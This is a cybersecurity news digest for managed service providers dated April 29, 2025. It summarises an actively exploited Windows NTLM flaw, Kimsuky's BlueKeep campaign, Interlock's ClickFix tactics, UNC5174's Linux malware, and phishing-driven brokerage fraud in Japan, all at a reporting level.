MSP cybersecurity news digest, April 29, 2025

CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog following confirmed evidence of active exploitation. One of them is CVE-2025-24054, a vulnerability affecting Windows systems. It allows attackers to capture NTLM (New Technology LAN Manager) hashes through malicious .library-ms files and is now being weaponized in phishing campaigns.

Although Microsoft patched the flaw in March 2025 and initially considered it unlikely to be exploited, researchers observed widespread exploitation just days later, peaking between March 20 and 25. Attackers sent phishing emails with Dropbox links containing ZIP files, which included a .library-ms file designed to trigger the flaw when extracted. This caused Windows to connect to a remote SMB server and attempt NTLM authentication, leaking hashed credentials. Later variants of the campaign dropped the archive entirely, with attackers sending the .library-ms file directly, making exploitation even easier. Additional files in the attack package exploited older NTLM flaws, providing backup methods for credential theft.

While IP addresses used in the attacks were linked to APT28, attribution remains inconclusive. Given the low user interaction needed to trigger the flaw, its potential for privilege escalation makes it a high-risk issue despite being rated medium severity.

A new malicious campaign by the North Korean state-sponsored group Kimsuky has been uncovered, targeting systems in South Korea and Japan.

The campaign, named Larva-24005 by researchers, exploits the BlueKeep vulnerability (CVE-2019-0708) in Microsoft Remote Desktop Services to gain initial access. Though a scanner for RDP vulnerabilities was found on compromised systems, its direct use wasn’t confirmed. BlueKeep, a critical flaw with a CVSS score of 9.8, allows remote code execution and was patched by Microsoft in May 2019.

Kimsuky also uses phishing emails to deliver payloads exploiting the older Equation Editor vulnerability (CVE-2017-11882). Once inside, the attackers install a dropper to deploy the MySpy malware and RDPWrap, enabling persistent RDP access and data gathering. They further escalate the attack by deploying keyloggers like KimaLogger and RandomQuery to capture keystrokes. The campaign has been ongoing since October 2023 and has primarily impacted software, energy and financial sectors in South Korea, with additional targets in several countries worldwide.

The Interlock ransomware gang has adopted ClickFix attacks, a social engineering technique that tricks users into running malicious PowerShell commands disguised as IT support actions.

These attacks often imitate trusted tools like Advanced IP Scanner, displaying fake CAPTCHA prompts and urging victims to "verify" themselves by copying and executing commands. Once executed, the commands download malware that installs both a legitimate-looking application and a hidden payload. This script ensures persistence, gathers system data, and sends it to the attackers' command and control server. Payloads observed include LummaStealer, BerserkStealer, keyloggers and the Interlock RAT, a remote access trojan used for further exploitation.

After the initial breach, Interlock operators move laterally using stolen credentials and tools like RDP, PuTTY, AnyDesk and LogMeIn. Data exfiltration to Azure Blobs is followed by ransomware deployment, typically scheduled daily as a redundancy tactic. Researchers underline that Interlock's ransom notes now emphasize legal and regulatory threats, while the ClickFix method has also been linked to North Korean groups like Lazarus targeting crypto job seekers.

China-linked threat actor UNC5174 has launched a new campaign targeting Linux systems using a modified version of the SNOWLIGHT malware and a new remote access trojan (RAT) called VShell.

This operation reflects a broader trend of attackers leveraging open-source tools for stealth and cost-efficiency, making attribution more difficult. Previously, UNC5174 exploited flaws in ConnectWise and F5 BIG-IP software to deploy SNOWLIGHT, which fetches additional tools like GOHEAVY and GOREVERSE from known C2 frameworks. In recent activity observed by researchers, SNOWLIGHT drops VShell via an in-memory, fileless payload, allowing attackers to remotely control infected systems. The attackers executed a malicious bash script to deploy SNOWLIGHT and Sliver binaries for persistence and communication with their command server.

French and Taiwanese cybersecurity agencies have linked similar techniques to UNC5174 and possibly other China-nexus groups, exploiting flaws in Ivanti appliances to breach global targets. The campaign spans nearly 20 countries and includes espionage-related accusations by China against the U.S. NSA for cyberattacks during the Asian Winter Games. Both SNOWLIGHT and VShell are capable of targeting macOS systems as well, further broadening the threat’s scope.

In Japan, a growing wave of cyber fraud has shaken the financial sector, as the Financial Services Agency (FSA) reports over 1,450 unauthorized stock transactions across six major securities firms. Between February 1 and April 16, attackers used stolen login credentials — harvested through phishing sites mimicking real brokerage portals — to access trading accounts and move over ¥95 billion in unauthorized trades.

Typically, attackers sell victims' holdings and reinvest the funds into Chinese stocks, possibly to manipulate prices and increase profits. While no direct money withdrawals have been confirmed, the sheer volume of trades highlights the scale of the breach. The FSA is urging customers to avoid clicking suspicious links, use strong, unique passwords, and enable multifactor authentication. Victims are advised to monitor accounts closely and report any anomalies immediately.

As investigations continue, the FSA emphasizes the importance of user vigilance and points to guidelines from the Japan Securities Dealers Association for safer online trading.